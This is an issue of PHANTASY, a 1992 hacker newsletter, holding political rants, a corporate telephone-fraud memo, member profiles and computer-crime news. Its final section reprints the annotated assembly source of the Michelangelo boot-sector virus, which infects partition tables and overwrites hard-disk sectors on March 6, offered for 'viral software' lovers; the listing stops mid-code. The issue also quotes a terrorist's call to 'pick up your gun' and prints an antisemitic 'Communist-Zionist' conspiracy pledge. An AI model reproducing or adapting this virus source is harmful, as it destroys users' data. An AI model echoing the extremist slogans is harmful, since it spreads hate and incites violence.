-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- = = - WELCOME TO THE EIGHTH ISSUE OF - = = - -=>PHANTASY<=- - = = - A PUBLICATION AND NEWSLETTER OF - = = - THE - = INTERNATIONAL = - INFORMATION - = RETRIEVAL = - GUILD - = = - Hacking,Phreaking,Anarchy,Survivalism,Commentary - = = -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Volume Number Three,Issue Number Eight Dated 6/05/92 Editor: Mercenary@f515.n141.z1.fidonet.org Article Submissions: The Mercenary/IIRG 862 Farmington Avenue Suite 306 Bristol,Ct 06010 IIRG World Headquarters BBS: Dark Shadows 19.2/9600 Baud HST 24 Hours a Day 1.2 Gigs Online (203)-628-9660 Table of Discontents: [1] Quick Comment By: Mercenary [2] Communists Alive and Well in the U.S. By: Red Dawn [3] TeleFraud: (A Case Example) By: Anonymous [4] IIRG Members Profiles: Rowdy Roddy Piper [5] New World Order Pledge of Dis-Allegiance Provided By: Saint Anarchy [6] IIRG FREEBIES: New Section Devoted to promotions available to our readers! [7] PHANTASY TIDBITS: News and Views of Interest [8] FOR THE PEOPLE Supplied By: Bulletin Boards Across the Country Edited by: Mercenary 1. Michelangelo Source Code 2. Phil Katz Warning 3. Virus Poem [9] Listing of PHANTASY Distribution Sites -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- OFFICIAL DISLAIMER... All information in PHANTASY is from USER contributed material The Publishers and Editors of PHANTASY and THE IIRG disclaim any liability from any damages of any type that the reader or user of such information contained within this newsletter may encounter from the use of said information. All files are brought to you for entertainment purposes only! We also assume all information infringes no copyrights and hereby disclaim any liability. PHANTASY is (C) 1990 by The IIRG IIRG and INTERNATIONAL INFORMATION RETRIEVAL GUILD is (C) 1982 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Section [1]: Quick Comment By: Mercenary ATTENTION!! All File creators,Publishers,BBS-aholics the Former IIRG WHQ Runestone BBS is gone. Please do not list it in your files. The New WHQ is: IIRG World Headquarters BBS: Dark Shadows 19.2/9600 Baud HST 24 Hours a Day 1.2 Gigs Online (203)-628-9660 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Section [2]: Communists Alive and Well in the U.S. By: Red Dawn The Berlin Wall came down, and its about time. But the RED Menace is alive and Well folks. The So called Russian Republics (Soviet DisUnion) haven't gone anywhere. So why are the piss ant politicians in the U.S. rolling over and playing Dead? Money, Yes its that simple Money. One world Government means power and power means money and as long as our leaders are more concerned about filling thier pockets and not filling peoples stomachs, were on our own. The Chinese Communists just exploded the largest underground nuclear blast ever, the Soviets still have there nukes and the PLP is alive and well here in the U.S. On a recent jaunt up to MIT, I was approached by a PLP (Progressive Labor Party) member. The PLP is the American Communist Party for those who are new to this. He asked if I'd like to buy a copy of "Challenge" (The Revolutionary Communist Newspaper) I said No, but I'll take this copy for free comrade. and walked off with the poor little Reds paper. NOTE: Please dont feel bad for the Red, Communism states whats yours is mine so I was just teaching him about true Communism control Now the PLP is getting smart, they are recruiting Puerto Ricans and other third world spanish speakers, as the lead story is "STOP RACIST REPATRIATION OF HAITANS" and the paper is now half spanish. What better way to boost your cause then appeal to an already unrestful group of people. Well I say enough, lets show the Communists that we can take America Back by unseating mailing them your thoughts. I'd Advise this on a Post Card: We Love America,and not Karl Marx.... Signed a Concerned American Mail to: The Progressive Labor Party 231 West 29th Street Room 502 New York,NY 10001 Or Call: (212)-629-0002 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- GIVE YOUR SOUL TO GOD AND PICK UP YOUR GUN, ITS TIME TO DEAL IN LEAD. WE ARE THE LEGIONS OF THE DAMNED,THE ARMY OF THE ALREADY DEAD. Robert J. Matthews -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Section [3]: TeleFraud: (A Case Example) By: Anonymous Hacking and Phreaking has long been a game of cat and mouse, between Hacker and System Administrator. In a role reversal I'd like to present the response of an Undisclosed Insurance Company to hackers penetrating thier system by presenting the memo distributed to system operators. ------------------------------------------------------------------------------- From the Director of Systems Security to all employees: We have experienced telephone fraud (TeleFraud) in which outsiders, (I.E. Hackers) penetrated a regional office telephone system and made long distance calls that were charged to the company (In one case the cost of those calls was about $27,000) A number of steps are being implemented to elimanate this exposure) We want to inform you about some of them, and ask for your help and cooperation. NOTE: This article may contain terminology new to you. A "Definition of Terms" is included on the last page to help clarify these terms. BACKGROUND: The most common form of telefraud involves the use of 800 numbers,credit cards, and third party calling. Hackers get these numbers from a number of sources, such as: A. Advertisements B. Eavesdropping (e.g. when you charge your telephone call to another number while using a public telephone) C. Using old company telephone books and manuals that contain numbers of Key System or Private Branch Exchange (PBX) systems, which are the heart of our internal telephone system. Technically sophisticated hackers dial these numbers, and through computer program routines, determine authorization codes. Having learned these codes, they post them on computer bulletin boards or sell them. Literally within minutes unauthorized calls are passing through the system. To reduce or eliminate this exposure, our department as well as others are working together to protect our telephone systems. Some of these protection measures include: 1. Development and implementation of controls in conjuction with our telephone vendors (e.g. AT&T and MCI) to restrict access to certain telephone features. Some of these controls include prohibiting the use of Remote Access,trunk to trunk,and DISA services. 2. Making you, as telephone users, aware of this problem and identifying ways you can help. This memo is part of this program. HOW CAN YOU HELP?: Here are some suggestions: Telephone Credit Cards: 1. Don't give your credit card number to anyone 2. When calling from a payphone, use card readers whenever possible. 3. Don't read the number loud enough for others to hear, or let others observe you entering your number. 4. Report lost or stolen cards immediately. 5. Use your body to block the view of someone who may be watching to see the access code you are punching into the telephone. 800 Service: 1. Don't install an 800 number unless it's absolutely necessary. 2. Remove the line when it's no longer needed. 3. Limit 800 service to applications that are answered by people. 4. Avoid 800 service to Phonemail or Voice Response Units (VRU). International/Domestic Toll Calls: 1. Block country and/or area codes that you don't call. 2. Limit the use of International Class of Service at the handset level. 3. Block 900 calls with the local telephone company. Dial Data Lines: 1. Block third party calling with the local telephone company. 2. Establish VNET range restrictions Remote Access: 1. Disable this feature on the PBX. We have surveyed our PBX vendors country-wide to ensure these facilities are not enabled. Trunk-to-Trunk: 1. Disable this feature on the PBX. We have surveyed our PBX vendors country-wide to ensure these facilities are not enabled. Phonemail: 1. Change passwords frequently 2. Deactivate unused mailboxes 3. Limit the number of "Guest" mailboxes 4. Don't publish the system access number to anyone who doesn't use phonemail. 5. Lock out the subscriber after three unsuccessful attempts to enter the mailbox. 6. Keep system administrator ID's secret and change them frequently. Third Party Calling: 1. Request the local telephone company to block third party calling on dial data,fax,and private lines. 2. Limit the installation of private lines PBX (Private Branch Exchange): 1. Do not reveal maintenance port passwords to callers without positive ID 2. Delete unused extensions VRU (Voice Response Units): 1. Do not enable trunk-to-trunk transfer. 2. Program only a select number of extensions to which callers can be transferred (i.e. establish a table of extensions). 3. Do not program station transfer 4. Passwords, (e.g. logon ID's customer PIN's) should be carefully protected and changed frequently. Automated Attendant: 1. Do not enable trunk-to trunk transfer. 2. Do not program station transfer 3. Delete unused extensions 4. Deactivate software features if not in use. Hardcopy Listings: 1. Properly dispose of old telephone books,manuals,or telephone bills that contain sensitive telephone numbers. 2. Review all telephone charges,looking for patterns and excessive charges. Dial Access to Computers: 1. Secure dial lines to all computer systems. Miscellaneous: 1. Be cautious of unusual situations with your telephone system, such as busy signals at odd times. DEFINITION OF TERMS PBX Private Branch Exchange. Private automatic system that provides for the switching of calls internally, and to and from the public telephone network. Trunk-to-Trunk A "trunk" is the telephone line that connects a PBX to the telephone company. Therefore a trunk-to-trunk connection ties a PBX system to the telephone company. DISA Stands for Direct Inward System Access. This feature gives an outside caller the ability to dial directly into a PBX system, without attendant (i.e. operator) intervention, and gain access to the PBX system facilities and outgoing circuits. DISA software should be disabled, thus eliminating this feature/exposure. Voice Mail Hardware and software products that can be integrated or peripheral to a PBX system, allowing users to send,receive,and redirect voice messages through office telephone systems and computers. Automated Attendant An automated telephone system used to accept incoming calls and direct their callers to specific extensions based upon the caller entering touch tone numbers. For example, a hacker could call someones Voicemail mailbox from the outside and try to break in. VRU (Voice Response Unit) An interactive system that interfaces between the PBX and host computer based upon information provided by the caller (e.g. account number,social security number) Remote Access Allows a caller at a remote location to access PBX features by telephone. Individual authorization codes are usually required. Remote access allows the caller to potentially access an outside (e.g. long distance) line, and is usually accomplished through the use of DISA or automated attendant features. VNET (Virtual Network) A registered MCI service that offers a range of telephone limits and/or restrictions (e.g. allows calls only within U.S., does not allow calls to Virgin Islands,etc.) Key System: A small, multi-line internal telephone system similar to a PBX. Norstar,Spirit,and Merlin are examples of a key system. Remember: All of us are potential victims of telephone fraud. Hackers are determined to use our telephone system and not pay for that service. Please be as determined to ensure they do not. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ONE CRIME IS CONCEALED BY THE COMMISSION OF ANOTHER Seneca -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Section [4]: IIRG Members Profiles: Rowdy Roddy Piper ------------------------------------------------------------------------------ Rowdy Roddy Piper ------------------------------------------------------------------------------ Handle: Rowdy Roddy Piper Call him: Piper Past handles: None Handle origin: Wrestler Rowdy Roddy Piper of WWF fame Past Computers: Commodore 64 With ICT Data Chief Commodore 128 Amiga 1000 286/12 Present Computer: 386/33 1300 Megs Storage Courier HST Courier HST Dual Standard Sysop: Pipers Pit BBS Background: Piper Started his original Commodore oriented BBS in March 1985. The Board was originally run off of a C-64 with 2 SFD 1001's. Continually upgrading his system Piper switched from his original C-Net configuration to Color 64 with a C-128 with 1750 Ram expander and 2 ICT Data Chief HFD20's. It was at this time that Piper met Mercenary at the now defunct CompuTech systems and started attending the original IIRG meetings at the Bar and pizza joint next door. With the Commodore community rapidly dwindling and the IIRG no longer supporting the C64/128, Piper sold his Commodore BBS for a $400.00 profit over what he invested in it and Bought a 286/12 and an Amiga 1000 with 1.5 megs. Now, with the his vast majority of users being IBM, Piper has switched to a 386/33 Tower with 1300 Megs of storage,2 Nodes (HST and HST D/S. But being true to his roots, Piper still supports the Amiga line. Pipers Favorite Things ---------------------- Running his BBS Music (Extensive CD Collection) The one month his phone bill ran under $100.00 Most Memorable Experiences -------------------------- Selling his original commodore BBS for $400.00 more than he originally purchased the Equipment for, and passing out at the 1989 IIRG Hack Bash before the keg was tapped. People to Mention ----------------- Thanks to: Pie Man, Mercenary, a downright strange individual Anubis, an even stranger individual The now defunct CompuTech systems and its owner Redbone Fucks to: Internal Revenue, America's Legal Organized Crime Syndicate Credit Bureaus, Go ahead---Make my Limit and 95% of all elected officials -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- A NICKNAME IS THE HEAVIEST STONE THE DEVIL CAN THROW AT A MAN Anon -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Section [5]: New World Order Pledge of Dis-Allegiance Provided By: Saint Anarchy As our brave and trustworthy leaders usher in there new world order, I suggest each one of you memorize this Pledge to it. We pledge dis-allegiance to the United Nations flag and the confusion, the treason,the wars,and the bloodshed for which it stands. One World (under Satan), uniting all nations under one Communist-Zionist international economic control. Promoting (under the guise of benevolence and welfare) Metro Government, Regionalization,Urban Renewal,Model Cities,causing distress to young and old,totally changing our form of government, and working toward a One World Bank (Acclomplished, a One World Government,and a One World Church, without God and his Holy Word, the Bible. In his name we reject and defy the United Nations Flag and the totalitarianism for which it stands. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- FREEDOM HATH A THOUSAND CHARMS TO SHOW THAT SLAVES HOWE'ER CONTENDED NEVER KNOW Cowper -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Section [6]: IIRG FREEBIES: A new section to Phantasy BY: Mercenary ------------------------------------------------------------------------------- [1] Security for VMS Systems Handbook Available from Digital Equipment Corporation Free of Charge Call 1-800-332-4636 Extension: SECURE ------------------------------------------------------------------------------- [2] Free $15.00 Introductory Usage to CompuServe Free Complimentary subscription to CompuServe Magazine Compliments of Digital Equipment Corporation Call 1-800-524-3388 Ask for Represenative #332 ------------------------------------------------------------------------------- [3] ARAGO Professional dBASE Call 1-800-228-3295 Ask for Free Demo Disk ------------------------------------------------------------------------------- [4] Flow Charting 3 Call 1-800-525-0082 Extension 1117 Ask for Free Interactive Demo Disk ------------------------------------------------------------------------------- [5] Vermont Views Portable User-Interface for Dos,Unix,Posix,VMS... Free Demo Kit Call 1-800-848-1248 Mention Offer #303 ------------------------------------------------------------------------------- [6] National Instruments Lab Programs Free Demo Disks 1-800-433-3488 ------------------------------------------------------------------------------- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Section [7]: PHANTASY TIDBITS: News and Views of interest from around the Computer World ------------------------------------------------------------------------------- I GOT EM,I GOT EM, I GOT EM.... Arizona Law officers are fuming that the U.S. Justice Department is taking credit for the first successful prosecution under the Operation Sundevil computer crime investigation. They point out that they nabbed and convicted two hackers swept up in the nationwide crackdown on computer crime several months ago. One of the hackers is still doing time in a halfway house after spending six months in "shock incarceration," a boot camp for first time offenders. ------------------------------------------------------------------------------- POOR LITTLE BIG BROTHER.... Difficulties tapping advanced digital telephone networks for criminal investigations have inspired the Federal Bureau of Investigation to propose legislation requiring carriers to modify their networks to accommodate court approved wiretaps. The multimillion dollar cost of re-engineering the networks would be borne by rate payers. Civil liberties groups said a built in tapping capability might encourage overly broad government surveillance. ------------------------------------------------------------------------------- COULD I GET SOME MINT JELLY WITH THAT PLEASE? A man charged with stealing computer boards from Digital Equipment Corporation between February and October 1990 recently received the severed head of a lamb wrapped in towels through the U.S. Mail. The box arrived at the Lexington, Mass., home of Edward Desmond Jr. on Feb 28th. Desmond had cooperated with the government during part of the 2 1/2 year investigation, which led to the indictment of 16 people. A plea agreement with Desmond was reportedly rescinded after he was caught commiting other crimes. ------------------------------------------------------------------------------- INTERNET ADVISORY BOARD SETS S.N.M.P. SECURITY RULES The Simple Network Management Protocol (SNMP) security specifications now before the Internet Advisory Board would provide the following features: 1. A data-encryption standard based specification that encrypts messages between the SNMP manager and agent. This is useful for sending down new or updated keys that determine what management functions a SNMP station can access or that define authorization levels within a station. 2. Origin Authentication that prevents unauthorized users who have obtained an SNMP workstations access code from masquerading as an authentic user. 3. Replay protection that keeps a user from delaying an SNMP transmission, such as a command to take a workstation offline, and sending it at a later date. 4. Message integrity that keeps authorized users from changing the contents of a SNMP message. ------------------------------------------------------------------------------- BOOK PUSHER SEEKS TO INFLATE EGO Computer Security Expert Winn Schwartau, whose book, Terminal Compromise, describes how a terrorist gang could paralyze the U.S. with a computer virus, sees a parrallel between his text and real life. "When the Michelangelo virus scare began, it was eerie, like somone had lifted the events right out of my book," he says. "Viruses are evolving into a terrorist's weapon and are certainly a viable means of waging warfare." Terminal compromise is published by Pittsburg-Based Inter-Pact press. IIRG Note: This Jack Ass will say anything to sell his book, so save the $19.95 and go out and get drunk instead. The book is pure garbage. ------------------------------------------------------------------------------- JACKASS's and MORE JACKASS's The Associated press reports that the theft of a portable PC in Australia was solved when the thief sent a fax to the unit's maker, DFM Systems of Des Moines,Iowa asking for a power cord,documentation, and software. What the crook didn't know was the DFM TraveLite PC was the only such system in Australia. The unit was owned by Sydney based ACEL, which the thief had burglarized. DFM contacted ACEL's managing director, who then contacted the police. A ploice officer later contacted the crook, who had supplied his street address on the fax. ------------------------------------------------------------------------------- I HEAR YA' KNOCKIN, BUT YA' CAN'T COME IN Whozz Calling uses your local phone company's Caller ID service to intercept the ID information before you answer your phone. The product sends the identification of the caller via standard RS-232 serial wire to your computer which looks up the caller name,displays it,stores it,elects not to answer the call, or diverts the call to an answering machine. A DOS compatible,menu driven TSR program can optionally pop up information about the caller,bringing up the callers ID before you answer the phone. Price: $79.00 (Requires Caller ID) Contact: Zeus Phonstuff 1000 Holcomb Woods Parkway Suite 410-C Roswell,GA 30076 (404)-587-1541 (404)-587-1609 (FAX) ------------------------------------------------------------------------------- TWO AT CORNELL INDICTED IN VIRUS CASE Two Cornell University students now have been indicted for felonies in connection with the computer virus case that came to light last February at the Ithaca, N.Y., university. David Blumenthal and Mark Pilgrim are accused of embedding a virus in three Apple Macintosh computer games that were sent from Cornell's computer center to an archive at Stanford University. Authorities say from there, the games were duplicated and wound up in computers across the U.S., Japan and Great Britain. Blumenthal, 20, and Pilgrim, 19, who, in convicted, face a maximum four years in prison, were arrested in February on misdemeanor charges, which were increased to felonies because the virus is believed to have caused more than $1,000 in damage, said county District Attorney George Dentes. ------------------------------------------------------------------------------- AT&T INTRODUCES PRODUCTS TO FIGHT PHONE FRAUD NEW YORK (Reuter) -- American Telephone & Telegraph Co. rolled out a new security program yesterday aimed at protecting businesses from anyone who might try to "steal" their long-distance telephone service. Branding phone fraud as a nationwide problem costing upwards of $1.2 billion a year, the company said its AT&T NetProtect program gives customers the products, services and education they need to combat such fraud, as well as protection against financial liability. Long-Distance fraud often takes place when an outsider, say a computer hacker, cracks the access codes to a company's private branch exchange, or PBX -- an internal phone system that allows easy access to branch offices and major customers. The PBX can then be used to place long-distance or international calls as if by someone inside the company. The practice, a misdemeanor crime with no jail sentence in many states, typically is done for monetary gain. The "stolen" service can be sold on the street, sometimes providing drug traffickers with international calls that cannot be traced. "Long-distance fraud is a serious criminal problem, and we believe AT&T should stand squarely with our customers against the criminals who steal the service," said Joseph Nacchio, president of AT&T's Business Communications Services division. AT&T, the long-distance carrier created by the 1984 breakup of the former Bell telephone system, said its new program would relieve customers from liability for the fraud. The company this week began monitoring its toll-free 800 service at no extra charge to prevent fraud. From Aug. 1, it also will monitor inter- national long-distance service to countries experiencing high levels of fraud. An AT&T spokesman declined to disclose the cost for enhanced and premium services that protect customers from financial liability, saying the cost structure has not yet been filed with the Federal Communications Commission. Other packages include a $1,995 software package that alerts customers to unusual calling patterns and a $150 an hour intervention service under which AT&T experts try to stop fraud while it is in progress. ------------------------------------------------------------------------------- WORLDWIDE MOBILE DATA SOLUTIONS ATLANTA -- May 18, 1992 -- Digital Equipment Corporation, RAM Mobile Data, and BellSouth Enterprises, Inc. today announced a worldwide agreement to provide mobile data solutions based on the Mobitex mobile packet radio network. Under the agreement, Digital will offer two-way wireless electronic mail to its more than three million existing ALL-IN-1 integrated office system customers. Digital is developing a version of its Mobilizer for ALL-IN-1 software that will enable users of portable MS-DOS PCs to access ALL-IN-1 electronic mail applications without a connection to a telephone outlet. Digital plans to provide the same services on the Mobitex mobile network in the United Kingdom. In addition, wireless electronic mail services will be offered to customers in several other countries where RAM and BellSouth plan to operate Mobitex networks. Digital's wireless electronic mail offering will be available in the first quarter of calendar year 1993. Digital also announced the DECmobile program, under which the company will deliver fully integrated, end-to-end mobile data communications solutions that extend enterprise computing networks to mobile users. The announcements were made at the ICA telecommunications industry conference held here May 18-21. "With these announcements, Digital is moving aggressively into the fast-growing mobile data market," said Ernst E. Wellhoener, vice president of Digital's Telecommunications Business Group. "We are supporting our commitment with substantial investments of time, money, and resources to build the kinds of mobile data solutions our customers require." Digital Becomes RAM Mobile Data Systems Integrator Under the DECmobile program, Digital will offer customers complete mobile data solutions, acting as systems integrator for RAM Mobile Data and other service providers. Digital will provide a single point of contact for customers seeking to benefit from new mobile data communications services. Digital is entering into business relationships with leading suppliers of radio modems, handheld PCs, and cellular devices. The company currently has relationships with Ericsson Mobile Communications AB, Fujitsu Personal Systems (formerly Poqet Computer Corporation), and Husky Computers, Inc. "The move into mobile data represents a natural progression for Digital, a leader in providing networked computer systems and one of the computer industry's foremost systems integrators," Wellhoener said. "Our ability to provide 'one-stop shopping' for mobile data solutions helps simplify what might otherwise be a difficult process for our customers, enabling them to get up-to-speed faster and more cost-effectively." Wellhoener said Digital chose Mobitex networks because they are feature-rich, sophisticated, and highly efficient. "And perhaps most important, the worldwide scope of Mobitex networks will enable us to meet the needs of today's multinational enterprises," Wellhoener added. Mike Harrell, president of BellSouth Mobile Data, Inc., said the alliance would enable mobile data network subscribers to take advantage of Digital's worldwide systems integration capabilities. "Aligning ourselves with an experienced systems integrator ensures our network subscribers have the most effective solutions," Harrell said. "We can now expand the market for Mobitex into a broad range of networked computer applications." Carl Robert Aron, chairman and CEO of RAM, said, "ALL-IN-1 is the world's leading host-based application that includes electronic mail. RAM's Mobitex network is the only mobile data network in operation which automatically delivers E-mail messages to mobile professionals wherever they are within the network service area. The marriage of Mobitex and Mobilizer for ALL-IN-1 was inevitable." Digital Develops Mobile Data Products and Programming Tools In addition to developing a wireless interface for its Mobilizer for ALL-IN-1 product, Digital is developing an open software architecture and a single set of application programming interfaces that will be available to software developers. The architecture and application programming interfaces, or APIs, facilitate the integration of new and existing mobile applications for RAM's and other service providers' networks. APIs make it easy for developers to write mobile data applications. BellSouth Mobile Data is a subsidiary of BellSouth Enterprises, Inc., the holding company that manages a group of companies for BellSouth Corporation that provide wireless telecommunications, advertising and publishing, and information-based services throughout the world. RAM Mobile Data operates a wireless data communications service in major metropolitan areas across the nation. Using RAM's service, companies exchange two-way messages and data with field personnel equipped with mobile, portable, or handheld terminals. RAM Mobile Data Ltd. operates a similar, compatible system in the United Kingdom. RAM's radio-based data communications network architecture is Mobitex, an international, open standard supplied by Ericsson. RAM has exclusive use of the Mobitex technology in the United States. Mobitex was developed by Ericsson Mobile Communications AB and Swedish Telecom. Digital and Ericsson last year signed a cooperation agreement under which the two companies will develop software tools for the integration of Digital's products with the Mobitex network. ALL-IN-1, DECmobile, the Digital logo, and Mobilizer for ALL-IN-1 are trademarks of Digital Equipment Corporation. Mobitex is a registered trademark of Swedish Telecom MS-DOS is a registered trademark of Microsoft Corporation. RAM Mobile Data's legal name is RAM Mobile Data USA Limited Partnership ------------------------------------------------------------------------------ HONEST OFFICER!, HE SAID HE BOUGHT THE STUFF Microsoft and the FBI recently raided four Silicon Valley companies seizing bootleg copies of MS-DOS 5.0 and Windows 3.0 as well as associated manuals with a street value of more than $180,000. The Tip-off came when distributors tried to sell MS-DOS 5.0 seperately. ------------------------------------------------------------------------------- BIG MAC ATTACK FOILED Two Cornell University students have been accused of creating a computer virus called MBDF-A, that infected computers around the world. David Blumenthal,20 and Mark Pilgrim,19 face a maximum four years in prison for allegedly hiding the virus in three Macintosh computer games that were sent via modem from Cornell's computer center to an archive at Stanford. Macintosh PC's across the USA,Great Britain,and Japan were infected when users downloaded the games. Once in the Macs the virus destroyed the operating system. The two were arrested on misdemeanor charges which have been increased to felonies because the virus may have caused more than $1,000 in Damage. ------------------------------------------------------------------------------- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Section [8]: FOR THE PEOPLE Files Collected from BBS's Across the country By You the Computer User! Edited By: Mercenary ------------------------------------------------------------------------------- IIRG NOTE: This source code file was floating around for some time we provide it here for the programmer or viral software lover. ------------------------------------------------------------------------------- ; ; ; Michelangelo ; Size: 512 ; Type: Boot infector ; Date of action: March 6th ; ; data_1e equ 4Ch ; (0000:004C=1DB1h) data_2e equ 4Eh ; (0000:004E=70h) data_3e equ 413h ; (0000:0413=280h) data_4e equ 7C05h ; (0000:7C05=203Ch) data_5e equ 7C0Ah ; (0000:7C0A=49EBh) data_6e equ 7C0Ch ; (0000:7C0C=2A3Ch) data_7e equ 7 ; (694E:0007=0) data_8e equ 8 ; (694E:0008=0) data_9e equ 0Ah ; (694E:000A=0) data_11e equ 7C03h ; (694E:7C03=0) seg_a segment assume cs:seg_a, ds:seg_a org 100h mich proc far start: jmp loc_6 ; (01AF) "This is what you see at sector 0" db 0F5h, 0, 80h, 9Fh, 2, 3 ; A lot of the virus is hidden db 0, 56h, 2, 0, 0C8h, 1Eh ; in these defined bytes db 50h, 0Ah, 0D2h, 75h, 1Bh, 33h ; watch this carefully db 0C0h, 8Eh, 0D8h, 0F6h, 6, 3Fh ; or you will miss where db 4, 1, 75h, 10h, 58h, 1Fh ; it writes to your db 9Ch, 2Eh, 0FFh, 1Eh, 0Ah, 0 ; partiton table db 9Ch, 0E8h, 0Bh, 0, 9Dh, 0CAh db 2, 0, 58h, 1Fh, 2Eh, 0FFh db 2Eh, 0Ah, 0, 50h, 53h, 51h db 52h, 1Eh, 6, 56h, 57h, 0Eh db 1Fh, 0Eh, 7, 0BEh, 4, 0 loc_1: ;Init registers mov ax,201h mov bx,200h mov cx,1 xor dx,dx ; Zero register pushf ; Push flags call dword ptr ds:data_9e; (694E:000A=0) jnc loc_2 ; Jump if carry=0 xor ax,ax ; Zero register pushf ; Push flags call dword ptr ds:data_9e; (694E:000A=0) dec si jnz loc_1 ; Jump if not zero jmp short loc_5 ; (01A6) loc_2: ;Zero registers clear direction xor si,si ; Zero register cld ; Clear direction lodsw ; String [si] to ax cmp ax,[bx] jne loc_3 ; Jump if not equal lodsw ; String [si] to ax cmp ax,[bx+2] je loc_5 ; Jump if equal loc_3: ; cmp byte ptr See infected mov ax,301h mov dh,1 mov cl,3 cmp byte ptr [bx+15h],0FDh je loc_4 ; Jump if equal mov cl,0Eh loc_4: ;call out all db hiden data mov ds:data_8e,cx ; (694E:0008=0) pushf ; Push flags call dword ptr ds:data_9e; (694E:000A=0) jc loc_5 ; Jump if carry Set mov si,3BEh mov di,1BEh mov cx,21h cld ; Clear direction rep movsw ; Rep while cx>0 Mov [si] mov ax,301h ; to es:[di] xor bx,bx ; Zero register mov cx,1 xor dx,dx ; Zero register pushf ; Push flags call dword ptr ds:data_9e; (694E:000A=0) loc_5: ;Clear all set pop di pop si pop es pop ds pop dx pop cx pop bx pop ax retn loc_6: ;Load all hiden data xor ax,ax ; Zero register mov ds,ax cli ; Disable interrupts mov ss,ax mov ax,7C00h mov sp,ax sti ; Enable interrupts push ds push ax mov ax,ds:data_1e ; (0000:004C=1DB1h) mov ds:data_5e,ax ; (0000:7C0A=49EBh) mov ax,ds:data_2e ; (0000:004E=70h) mov ds:data_6e,ax ; (0000:7C0C=2A3Ch) mov ax,ds:data_3e ; (0000:0413=280h) dec ax dec ax mov ds:data_3e,ax ; (0000:0413=280h) mov cl,6 shl ax,cl ; Shift w/zeros fill mov es,ax mov ds:data_4e,ax ; (0000:7C05=203Ch) mov ax,0Eh mov ds:data_1e,ax ; (0000:004C=1DB1h) mov ds:data_2e,es ; (0000:004E=70h) mov cx,1BEh mov si,7C00h xor di,di ; Zero register cld ; Clear direction rep movsb ; Rep while cx>0 Mov [si] jmp dword ptr cs:data_11e; to es:[di] (694E:7C03=0) db 33h, 0C0h, 8Eh, 0C0h, 0CDh, 13h ;<- Notice all the db 0Eh, 1Fh, 0B8h, 1, 2, 0BBh ; cd 13 db 0, 7Ch, 8Bh, 0Eh, 8, 0 db 83h, 0F9h, 7, 75h, 7, 0BAh db 80h, 0, 0CDh, 13h, 0EBh, 2Bh db 8Bh, 0Eh, 8, 0, 0BAh, 0 db 1, 0CDh, 13h, 72h, 20h, 0Eh db 7, 0B8h, 1, 2, 0BBh, 0 db 2, 0B9h, 1, 0, 0BAh, 80h db 0, 0CDh, 13h, 72h, 0Eh, 33h db 0F6h, 0FCh, 0ADh, 3Bh, 7, 75h db 4Fh, 0ADh, 3Bh, 47h, 2 db 75h, 49h loc_7:;check if it is time to nuke xor cx,cx ; Zero register mov ah,4 int 1Ah ; Real time clock ah=func 04h don't work on an xt ; read date cx=year, dx=mon/day cmp dx,306h ; See if March 6th je loc_8 ; Jump if equal to nuking subs retf ; Return to launch command.com loc_8:;get ready xor dx,dx ; Zero register mov cx,1 loc_9:;run 7 times nuke 31.5 megs of hd mov ax,309h mov si,ds:data_8e ; (694E:0008=0) cmp si,3 je loc_10 ; Jump if equal mov al,0Eh cmp si,0Eh je loc_10 ; Jump if equal mov dl,80h mov byte ptr ds:data_7e,4; (694E:0007=0) mov al,11h loc_10: ;nuke away mov bx,5000h mov es,bx int 13h ; Disk dl=drive a: ah=func 03h ; write sectors from mem es:bx jnc loc_11 ; Jump if carry=0 xor ah,ah ; Zero register int 13h ; Disk dl=drive a: ah=func 00h ; reset disk, al=return status loc_11: ;rest for loc-9 nuking inc dh cmp dh,ds:data_7e ; (694E:0007=0) jb loc_9 ; Jump if below xor dh,dh ; Zero register inc ch jmp short loc_9 ; (0250) loc_12:;time to infect a floppie or hard dirve mov cx,7 mov ds:data_8e,cx ; (694E:0008=0) mov ax,301h mov dx,80h int 13h ; Disk dl=drive a: ah=func 03h infect flopie ; write sectors from mem es:bx jc loc_7 ; Jump if carry Set mov si,3BEh mov di,1BEh mov cx,21h rep movsw ; Rep while cx>0 Mov [si] mov ax,301h : to es:[di] xor bx,bx ; Zero register inc cl int 13h ; Disk dl=drive a: ah=func 03h lets infect hd ; write sectors from mem es:bx ;* jmp short loc_13 ;*(02E0) db 0EBh, 32h db 1, 4, 11h, 0, 80h, 0 db 5, 5, 